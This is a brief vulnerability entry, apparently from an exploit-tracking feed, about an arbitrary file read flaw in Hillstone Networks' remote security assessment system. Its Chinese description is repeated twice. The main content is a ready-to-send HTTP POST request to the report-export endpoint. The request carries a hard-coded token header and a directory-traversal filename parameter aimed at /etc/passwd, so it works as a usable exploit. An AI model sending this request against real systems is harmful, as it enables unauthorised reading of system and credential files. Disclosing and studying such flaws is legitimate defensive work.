Description
山石网科远程安全评估系统存在任意文件读取漏洞。该系统对用户输入的文件路径参数缺乏严格的权限校验与过滤,远程攻击者可通过构造恶意路径请求,绕过认证读取系统敏感文件,导致系统敏感信息泄露,为后续攻击提供数据支撑。
山石网科远程安全评估系统存在任意文件读取漏洞。该系统对用户输入的文件路径参数缺乏严格的权限校验与过滤,远程攻击者可通过构造恶意路径请求,绕过认证读取系统敏感文件,导致系统敏感信息泄露,为后续攻击提供数据支撑。
POST /report/export-web-report.aj HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Token: 18249c5f2074ce8e1ce60e8ab9bc1e6916cb5d9ab7aec77958f685b156b07726
filename=../../../../../../../../../../etc/passwd&name=test.txt
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.